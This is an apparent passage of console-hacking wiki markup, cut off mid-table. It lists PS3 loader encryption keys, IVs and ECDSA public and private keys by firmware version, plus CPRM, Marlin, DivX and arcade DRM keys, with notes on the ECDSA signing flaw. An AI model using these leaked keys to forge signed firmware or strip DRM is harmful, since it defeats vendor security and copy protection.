&lt;pre&gt;<br /> p = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DF<br /> a = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DC<br /> b = 402DAD3EC1CBCD165248D68E1245E0C4DAACB1D8<br /> N = 009DC9D81355ECCEB560BDC44F54817B2C7F5AB017<br /> Gx = 2E64FC22578351E6F4CCA7EB81D0A4BDC54CCEC6<br /> Gy = 0914A25DD05442889DB455C7F23C9A0707F5CBB9<br /> &lt;/pre&gt;<br /> <br /> Second aes-256-ctr_key:<br /> 6634510EF3D58392B8689C487AEC8CF2AC90663B354D580B90FB98FE7DB5C384<br /> Second aes-256-ctr iv:<br /> BC0D7738D332B780A6F89ED022745F0A<br /> <br /> == CPRM ==<br /> Decryption key for obfuscated arrays:<br /> <br /> Key 688D8FECC3AAB50AAE45506B41A48BC3<br /> IV 6AC5B2F7055C031AE36BA31D285D24E5<br /> <br /> Decrypted array 1:<br /> 3AD09AB6F5C116B758F6EDE6D98C57FC<br /> FD4B9B470E8EFFF3BBBA0A8015D72B36<br /> 6A435A89B45D71198FA088B8E88AC3AE<br /> 7C4E3DB596CC21001A6B12DB1FE4119D<br /> D39368B07F3B52B994DDA51B466031EC<br /> C9F8E95E1398BF27560891E36F2040B2<br /> 2CCE0210E018D56CDECD8779AFA92650<br /> F233926EC03F3941AA5B7D2403D62FEB<br /> 0B99864C51458D2EEF077BE24D7AFE25<br /> 5C29A2A8B1F0B3C4307E6338CBF44FD1<br /> DF4432DC175F662A819E774A656734FA<br /> 541E14BE04F1A79C8B37EE85AB220F69<br /> C5D40584A47342A164E1708390C2480D<br /> 611CC672FB7674E701D8C8D275A3CF28<br /> 821D4935C7BDCAA6AC0C62ADF93CEA2D<br /> 59DA3E976D09F755E523539F06BC9578<br /> <br /> Decrypted array 2:<br /> 009153EE3EC7524B0000000000000000<br /> <br /> == AV CC Multi ==<br /> <br /> 942C152C1C2C9D2C94AE15AE1CAE9DAE<br /> <br /> == Archive keys ==<br /> <br /> FA72CEEF59B4D2989F111913287F51C7 generic key<br /> <br /> EA02CEEF5BB4D2998F611910D77F51C6 per console key<br /> <br /> == Marlin DRM ==<br /> <br /> DES key/iv? 7563686979616D61 <br /> <br /> KeyRing SHA1 Seed? DAAA8CE98DFA1563A5E3E27FBBCF6443<br /> <br /> == DivX DRM ==<br /> <br /> Key 0678CE0EC45DA9554D2CDA549B91BC1C<br /> <br /> == Arcade Master Key ==<br /> <br /> Key 359F59BB8C256B91093A92007203ABB33BADF5AC09A0DC005859D6F159C4F54F<br /> IV 929214D8FCCB4CE7099ACEBDFC6612B9<br /> <br /> * used for encrypting Arcade/SYSDB ENCDEC/ATA Seeds<br /> * located at Lv1Ldr<br /> <br /> == Arcade/SYSDBG ATA Decryption Key ==<br /> <br /> Key 5F20A21ED12FF6425B62FDE0D1881C8464131BE76B28CE9A<br /> IV 00000000000000000000000000000000<br /> <br /> * algo is aes-192-cbc, used for System 357A (GECR-1100)<br /> * Key forged by encrypting Arcade ATA Seeds with Master Key<br /> <br /> == Modules ==<br /> <br /> ==== Notes ====<br /> * in CEB Ebootroms, Sony uses the same 256bits keysets for self/rvk (lv0 uses lv1 keyset) than the ones initially available until 3.30 with a broken aes256ctr (yes, they use a 256bit key)<br /> * With Ebootroms themselves, only the first half is used on ceb2010-2060 ebootroms <br /> * Likewise, the individual_info erk is 256 bit size, but only first half is used.<br /> <br /> <br /> ''A '-' means that the cell is empty, because the version does not matter or the private key cannot be calculated (see 3.56 and later below) like has been done in 3.55 and earlier. See also : http://www.mhlavac.info/wp-content/uploads/downloads/2010/03/lec2.pdf<br /> <br /> * &amp;lt;= 3.55:<br /> ** Randomfail present, thus when private key is unknown: use scekrit ;<br /> ** No obfuscation added to loaders yet, thus keytable as seen inside loader are the keys used by crypto engine (in SPU, or key as used by en/decryption tools like scetool)<br /> * 3.56:<br /> ** Fixed the randomfail in 3.56 and later after the fail0verflow presentation at 27C3, thus scekrit is of no use, see also: [http://www.instructables.com/id/Understanding-how-ECDSA-protects-your-data/?ALLSTEPS] ;<br /> ** No obfuscation added to loaders ''yet''<br /> * =&amp;gt;3.60:<br /> ** fixed the randomfail since 3.56, thus scekrit is of no use ;<br /> ** Obfuscation of keytable was added since 3.60 see [[Keys#Key_Scrambling|Key Scrambling]], which used [[Undocumented SPU Channels|ch72]] ringbuffer seed for deobfuscation.<br /> *** &quot;dec&quot; in ldr table refers to the deobfuscated key as used by crypto engine ;<br /> *** &quot;enc&quot; in ldr table refers to the obfuscated key as seen directly inside the decrypted loader keytable<br /> <br /> ===Lv0Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-key for decrypting<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv0ldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 0.60+ || &lt;code&gt;CA7A24EC38BDB45B98CCD7D363EA2AF0C326E65081E0630CB9AB2D215865878A&lt;/code&gt; || &lt;code&gt;F9205F46F6021697E670F13DFA726212&lt;/code&gt; || &lt;code&gt;A8FD6DB24532D094EFA08CB41C9A72287D905C6B27B42BE4AB925AAF4AFFF34D41EEB54DD128700D&lt;/code&gt; || &lt;code&gt;001AD976FCDE86F5B8FF3E63EF3A7F94E861975BA3&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 030.001-050.013 ({{CEB}}) || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===MetLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | metldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | metldr || - || &lt;code&gt;C0CEFE84C227F75BD07A7EB846509F93B238E770DACB9FF4A388F812482BE21B&lt;/code&gt; || &lt;code&gt;47EE7454E4774CC9B8960C7B59F4C14D&lt;/code&gt; || &lt;code&gt;C2D4AAF319355019AF99D44E2B58CA29252C89123D11D6218F40B138CAB29B7101F3AEB72A975019&lt;/code&gt; || &lt;code&gt;00C5B2BFA1A413DD16F26D31C0F2ED4720DCFB0670&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Lv1ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80 || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv1ldr || 030.001-3.31 || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.40-3.42 || &lt;code&gt;B880593856C8C6D2037585626A12977F50DCFCF3F132D2C89AA6E670EAFC1646&lt;/code&gt; || &lt;code&gt;A79B05D4E37B8117A95E6E7C14FB640E&lt;/code&gt; || &lt;code&gt;7454C7CCBFC2F66C142D78A730A3A6F973CC0FB75A46FCBB390790138910A0CAC78E5E21F4DA3375&lt;/code&gt; || &lt;code&gt;00033A699FDD2DA6CDD6CCC03B2C6145F998706F74&lt;/code&gt; || &lt;code&gt;0x34&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.50 || &lt;code&gt;1E8EEEA9E80A729F3FA52CF523B25941EA44B4155D94E5DADC5C5A77847620C7&lt;/code&gt; || &lt;code&gt;E034D31A80316960024D1B3D3164FDC3&lt;/code&gt; || &lt;code&gt;7E3A196f4A5879F3A7B091A2263F7C24E1716129B580566D308D9C2254B36AEE53DEF30EC85F8398&lt;/code&gt; || &lt;code&gt;005815D17125D04C33790321DE29EB6241365100B5&lt;/code&gt; || &lt;code&gt;0x35&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.55 || &lt;code&gt;53ABDF84BE08B0351B734F2B97D2BE1621BC6C889E4362E5C70F39D6C3ED9F23&lt;/code&gt; || &lt;code&gt;44E652661AC7584DBE08ECB810FB5FC0&lt;/code&gt; || &lt;code&gt;733198A7759BC07326755BC9773A8A17C8A7043C7BDAB83D88E230512E2EA3852D7DA4263A7E97F9&lt;/code&gt; || &lt;code&gt;004312C65347ACBE95CC306442FEFD0AF4C2935EB3&lt;/code&gt; || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.56 || &lt;code&gt;48793EBDDA1AF65D737DA2FDA2DD104447A698F8A82CAAEE992831711BA94E83&lt;/code&gt; || &lt;code&gt;15DCF3C67147A45D09DE7521EECA07A1&lt;/code&gt; || &lt;code&gt;85A8868C320127F10B6598964C69221C086702021D31803520E21FDE4DBE827766BE41825CB7328C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60-3.61 || &lt;code&gt;5FF17D836E2C4AD69476E2614F64BDD05B9115389A9A6D055B5B544B1C34E3D5&lt;/code&gt; || &lt;code&gt;DF0F50EC3C4743C5B17839D7B49F24A4&lt;/code&gt; || &lt;code&gt;1CDABE30833823F461CA534104115FFF60010B710631E435A7D915E82AE88EDE667264656CB7062E&lt;/code&gt; || - || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65-3.66 || &lt;code&gt;BD0621FA19383C3C72ECBC3B008F1CD55FFD7C3BB7510BF11AD0CF0FC2B70951&lt;/code&gt; || &lt;code&gt;569AF3745E1E02E3E288273CDE244CD8&lt;/code&gt; || &lt;code&gt;21E26F11C2D69478609DD1BD278CDFC940D90386455BA52FCD1FA7E27AC2AFA826C79A10193B625C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70-3.74 || &lt;code&gt;41A6E0039041E9D8AAF4EF2F2A2971248EDBD96A3985611ED7B4CE73EE4804FE&lt;/code&gt; || &lt;code&gt;C8C98D5A5CE23AF5607A352AECACB0DC&lt;/code&gt; || &lt;code&gt;4389664390265F96C1A882374C0F856364E33DB09BE124A4666F9A12F0DD9C811EDD55BA21ED0667&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.00-4.11 || &lt;code&gt;557EDF6C063F3272B0D44EEC12F418DA774815B5415597CC5F75C21E048BAD74&lt;/code&gt; || &lt;code&gt;7144D7574937818517826227EF4AC0B4&lt;/code&gt; || &lt;code&gt;085D38DBF9B757329EB862107929909D32FA1DAE60641BF4AC25319D7650597EE977F8E810FEEA96&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.20-{{latest}} || &lt;code&gt;10CEA04973FCCC12EC19924510822D8D4C41F657FD3D7E73F415A8D687421BCD&lt;/code&gt; || &lt;code&gt;ED8699562C6AC65204FA166257E7FCF4&lt;/code&gt; || &lt;code&gt;9AF86FC869C159FBB62F7D9674EE257ABF12E5A96D5875B4AA73C13C2BC13E2A4079F98B9B935EE2&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |}<br /> <br /> ===Lv2Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv2ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 030.001-3.31 || &lt;code&gt;94303F69513572AB5AE17C8C2A1839D2C24C28F65389D3BBB11894CE23E0798F&lt;/code&gt; || &lt;code&gt;9769BFD187B90990AE5FEA4E110B9CF5&lt;/code&gt; || &lt;code&gt;AFAF5E96AF396CBB69071082C46A8F34A030E8EDB799E0A7BE00AA264DFF3AEBF7923920D559404D&lt;/code&gt; || &lt;code&gt;0070ABF9361B02291829D479F56AB248203CD3EB46&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.40-3.42 || &lt;code&gt;575B0A6C4B4F2760A03FE4189EBAF4D947279FD982B14070349098B08FF92C10&lt;/code&gt; || &lt;code&gt;411CB18F460CE50CAF2C426D8F0D93C8&lt;/code&gt; || &lt;code&gt;3FEE313954CB3039C321A7E33B97FFDEC8988A8B55759161B04DBF4731284E4A8191E3F17D32B0EA&lt;/code&gt; || &lt;code&gt;0073076441A08CD179E5FACE349B86DA58B5B7BA78&lt;/code&gt; || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.50 || &lt;code&gt;6DBD48D787C58803A8D724DA5ACF04FF8FCE91D7545D2322F2B7ABF57014AF68&lt;/code&gt; || &lt;code&gt;603A36213708520ED5D745DEC1325BA5&lt;/code&gt; || &lt;code&gt;5888CB83AC3CCA9610BC173C53141C0CA58B93719E744660CA8823D5EAEE8F9BF736997054E4B7E3&lt;/code&gt; || &lt;code&gt;0009EBC3DE442FA5FBF6C4F3D4F9EAB07778A142BD&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.55 || &lt;code&gt;84015E90FA23139628A3C75CC09714E6427B527A82D18ABC3E91CD8D7DDAFF17&lt;/code&gt; || &lt;code&gt;5B240444D645F2038118F97FD5A145D5&lt;/code&gt; || &lt;code&gt;B266318245266B2D33641CD8A864066D077FAC60B7E27399099A70A683454B70F9888E7CC0C2BF72&lt;/code&gt; || &lt;code&gt;009D4CBA2BFB1A8330D3E20E59D281D476D231C73A&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.56 || &lt;code&gt;EAE15444048EFDE7A831BFA9F5D96F047C9FCFF50723E292CF50F5417D81E359&lt;/code&gt; || &lt;code&gt;9CA9282DC7FA9F315EF3156D970B7CD4&lt;/code&gt; || &lt;code&gt;0D58938CB47598A6A672874F1768068F8B80D8D17014D2ABEBAC85E5B0993D9FB6F307DDC3DDA699&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60-3.61 || &lt;code&gt;88AD367EDEC2FEED3E2F99B1C685075C41BDEC90C84F526CAF588F89BBD1CBCC&lt;/code&gt; || &lt;code&gt;8D18E8E525230E63DE10291C9DD615BF&lt;/code&gt; || &lt;code&gt;86EED1D65E58890ABDA9ACA486A2BDDB9C0A529C2053FAE301F0F698EAF443DA0F60595A597A7027&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65-3.66 || &lt;code&gt;688D5FCAC6F4EA35AC6AC79B10506007286131EE038116DB8AA2C0B0340D9FB0&lt;/code&gt; || &lt;code&gt;75E0239D18B0B669EAE650972F99726B&lt;/code&gt; || &lt;code&gt;008E1C820AC567D1BFB8FE3CC6AD2E1845A1D1B19ED2E18B18CA34A8D28A83EC60C63859CDB3DACA&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70-3.74 || &lt;code&gt;E81C5B04C29FB079A4A2687A39D4EA97BFB49D80EF546CEB292979A5F77A6254&lt;/code&gt; || &lt;code&gt;15058FA7F2CAD7C528B5F605F6444EB0&lt;/code&gt; || &lt;code&gt;438D0E5C1E7AFB18234DB6867472FF5F52B750F30C379C7DD1EE0FD23E417B3EA819CC01BAC480ED&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.00-4.11 || &lt;code&gt;A1E4B86ED02BF7F1372A2C73FE02BC738907EB37CE3BA605FE783C999FAFDB97&lt;/code&gt; || &lt;code&gt;BBE7799B9A37CB272E386618FDFD4AEC&lt;/code&gt; || &lt;code&gt;5B31A8E2A663EBD673196E2E1022E0D64988C4E1BBFE5E474415883A3BA0D9C562A2BE9C30E9B4A8&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.20-{{latest}} || &lt;code&gt;0CAF212B6FA53C0DA7E2C575ADF61DBE68F34A33433B1B891ABF5C4251406A03&lt;/code&gt; || &lt;code&gt;9B79374722AD888EB6A35A2DF25A8B3E&lt;/code&gt; || &lt;code&gt;1034A6F98AF6625CC3E3604B59B971CA617DF337538D2179EBB22F3BDC9D0C6DA56BA7DDFD205A50&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===IsoLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! Revision !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | isoldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || 0x01 ||&lt;code&gt;9E85BEE6D39E9632A77FE3CD6E647C8DFE4606C383E1697DD6D9CE63341EAFF9&lt;/code&gt; || &lt;code&gt;2C1F4C82FF3A796D3A772CEEF010ECA4&lt;/code&gt; || &lt;code&gt;625D1DF4C3264BBA9FC17A4437BA42591585A5ECCC6F3042DB3A80CBBC0426DAF33549C537AA7782&lt;/code&gt; || &lt;code&gt;00D19A1B338041F7C31062B9C40E725E1DA5D7C11A&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | isoldr || 0.80-3.31 || 0x01 || &lt;code&gt;8860D0CFF4D0DC688D3223321B96B59A777E6914961488E07048DAECB020ECA4&lt;/code&gt; || &lt;code&gt;C82D015D46CF152F1DD0C16F18B5B1E5&lt;/code&gt; || &lt;code&gt;733918D7C888130509346E6B4A8B6CAA357AB557E814E8122BF102C14A314BF9475B9D70EAF9EC29&lt;/code&gt; || &lt;code&gt;009BE892E122A5C943C1BB7403A67318AA9E1B286F&lt;/code&gt; || &lt;code&gt;0x36&lt;/code&gt;<br /> |-<br /> | isoldr || 3.40-3.42 || 0x01 || &lt;code&gt;101E27F3FA2FB53ACA924F783AD553162D56B975D05B81351A1111799F20254D&lt;/code&gt; || &lt;code&gt;8D2E9C6297B8AD252998458296AC773C&lt;/code&gt; || &lt;code&gt;138446EE0BDDA5638F97328C8956E6489CBBFE57C5961D40DD5C43BB4138F1C400A8B27204A5D625&lt;/code&gt; || &lt;code&gt;00849DBC57D3B92F01864E6E82EB4EF0EF6311E122&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | isoldr || 3.50 || 0x01 || &lt;code&gt;3F2604FA27AEADFBE1AC69EB00BB16EF196C2193CBD62900FFD8C25041680843&lt;/code&gt; || &lt;code&gt;A414AC1DB7987E43777651B330B899E1&lt;/code&gt; || &lt;code&gt;1F4633AFDE18614D6CEF38A2FD6C4CCAC7B6EB8109D72CD066ECEBA0193EA3F43C37AE83179A4E5F&lt;/code&gt; || &lt;code&gt;0085B4B05DEBA7E6AD831653C974D95149803BB272&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | isoldr || 3.55 || 0x01 || &lt;code&gt;BDB74AA6E3BA2DC10B1BD7F17198399A158DBE1FA0BEA68C90FCACBE4D04BE37&lt;/code&gt; || &lt;code&gt;0207A479B1574F8E7F697528F05D5435&lt;/code&gt; || &lt;code&gt;917E1F1DC48A54EB5F10B38E7569BB5383628A7C906F0DCA62FDA33805C15FAB270016940A09DB58&lt;/code&gt; || &lt;code&gt;00294411363290975BA551336D3965D88AF029A17B&lt;/code&gt; || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.56 || 0x01 || &lt;code&gt;311C015F169F2A1E0757F7064B14C7C9F3A3FFEE015BD4E3A22401A2667857CE&lt;/code&gt; || &lt;code&gt;7BB8B3F5AC8E0890E3148AE5688C7350&lt;/code&gt; || &lt;code&gt;3F040EFA2335FED5670BA4D5C3AB2D9D0B4BA69D154A0062EA995A7D21DBAF0DC5A0DAD333D1C1DD&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60-3.61 || 0x01 || &lt;code&gt;8474ADCA3B3244931EECEB9357841442442A1C4A4BCF4E498E6738950F4E4093&lt;/code&gt; || &lt;code&gt;FFF9CACCC4129125CAFB240F419E5F39&lt;/code&gt; || &lt;code&gt;098E1A53E59A95316B00D5A29C05FFEBAE41D1A8A386F9DA96F98858FD25E07BB7A3BC96A5D5B556&lt;/code&gt; || - || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65-3.66 || 0x01 || &lt;code&gt;E6A21C599B75696C169EC02582BDA74A776134A6E05108EA701EC0CA2AC03592&lt;/code&gt; || &lt;code&gt;D292A7BD57C0BB2EABBCA1252FA9EDEF&lt;/code&gt; || &lt;code&gt;2ED078A13DC4617EB550AD06E228C83C142A2D588EB5E729402D18038A14842FD65B277DCAD225A5&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x01 || &lt;code&gt;072D3A5C3BDB0D674DE209381432B20414BC9BDA0F583ECB94BD9A134176DD51&lt;/code&gt; || &lt;code&gt;8516A81F02CF938740498A406C880871&lt;/code&gt; || &lt;code&gt;5A778DEB5C4F12E8D48E06A2BBBBE3C90FA8C6C47DF9BDB5697FD4A8EB7941CE3F59A557E81C787D&lt;/code&gt; || - || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x0100 || &lt;code&gt;786FAB8A0B89474A2CB80B3EA104CCCB9E13F66B45EC499BB31865D07C661EA8&lt;/code&gt; || &lt;code&gt;94662F13D99A9F5D211C979FFDF65FE3&lt;/code&gt; || &lt;code&gt;912C94C252B7799CEB45DFBB73EF7CAD9BCC0793A3331BBB79E3C47C0F5C782F698065A8D4DB0D8B&lt;/code&gt; || - || &lt;code&gt;0x0E&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x01 || &lt;code&gt;4262657A3185D9480F82C8BD2F81766FCC2C8FD7DD5EBE8657B00B939E0C75BD&lt;/code&gt; || &lt;code&gt;4F1E3EF07D893A4714B1B3D5A4E50479&lt;/code&gt; || &lt;code&gt;4DBFCFA68B52F1D66E09AFA6C18EC65479EDBD027B6B8C6A5D85FE5C84D43EA40CEF1672078A0702&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x0100 || &lt;code&gt;16AA7D7C35399E2B1BFAF68CD19D7512A7855029C08BECC4CC3F035DF7F9C70B&lt;/code&gt; || &lt;code&gt;0E50DB6D937D262CB0499136852FCB80&lt;/code&gt; || &lt;code&gt;AEE2795BF295662A50DFAFE70D1B0B6F0A2EBB211E1323A275FC6E2D13BE4F2F10CA34784F4CF1EC&lt;/code&gt; || - || &lt;code&gt;0x0F&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x01 || &lt;code&gt;63565DBE98C3B1A52AADC907C47130FE57A10734E84F22592670F86ED2B0A086&lt;/code&gt; || &lt;code&gt;953F6A99891B4739358F5363A00C08B9&lt;/code&gt; || &lt;code&gt;26BE7B02E7D65C6C21BF4063CDB8C0092FE1679D62FA1A8CCC284A1D21885473A959992537A06612&lt;/code&gt; || - || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x0100 || &lt;code&gt;B96EA32CB96EA32DB96EA32CB96EA32CB96EA32CB96EA32DB96EA32CB96EA32C&lt;/code&gt; || &lt;code&gt;B96EA32CB96EA32DB96EA32DB96EA32C&lt;/code&gt; || &lt;code&gt;2D7066E68C6AC3373B1346FD76FE7D18A207C811500E65D85DB57BC4A27AD78F59FD53F38F50E151&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spp verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spp_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spp_verifier || 0.80-3.55 || &lt;code&gt;56C655747A4B6957A2D8BB9AC605C297E6AC9871932BFECDDE066CEE5B29470A&lt;/code&gt; || &lt;code&gt;007E6B268EF1E986D10A9889CF93A8CB&lt;/code&gt; || &lt;code&gt;265C04E7F20C3B8ACAC90E7C9D12757ED7ACBC01AA6624A2A927E719A4AA1222F87D917005F6072A&lt;/code&gt; || &lt;code&gt;0001608EF3BACAFFB8C3A5958A24F758325B62B08C&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.56 || &lt;code&gt;7FD222B3FEF467DF7E3F63AC8B77501A3B38752411E96AFEDA6587B5CD5E91B0&lt;/code&gt; || &lt;code&gt;B889290922B002F57086B818A8FDE3CC&lt;/code&gt; || &lt;code&gt;71E12CB3D81AFA79670AF4FAC4BBE41AA7F7DDF368F5615E933CB1C21A783B73C085CA49986CCF63&lt;/code&gt; || - || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.60-3.61 || &lt;code&gt;ED17248214B9AB34D57ED5CA6CCAEC9879137B4B46CE5064E6491D34001BACF2&lt;/code&gt; || &lt;code&gt;3E05572881C5BC845D310EAC28497B08&lt;/code&gt; || &lt;code&gt;504F905A8AAAA0E9BF55F6D5285697E2CABDB1A5240C4745BE8923308169EAB43E1BFD265F5E579E&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | spp_verifier || 3.65-3.66 || &lt;code&gt;E750FE8ED144D99782AC605944350B9F41AE489C3274C42C1BFD5AB06115C7C4&lt;/code&gt; || &lt;code&gt;0F23BBED0473B4899AD793AC76D8F722&lt;/code&gt; || 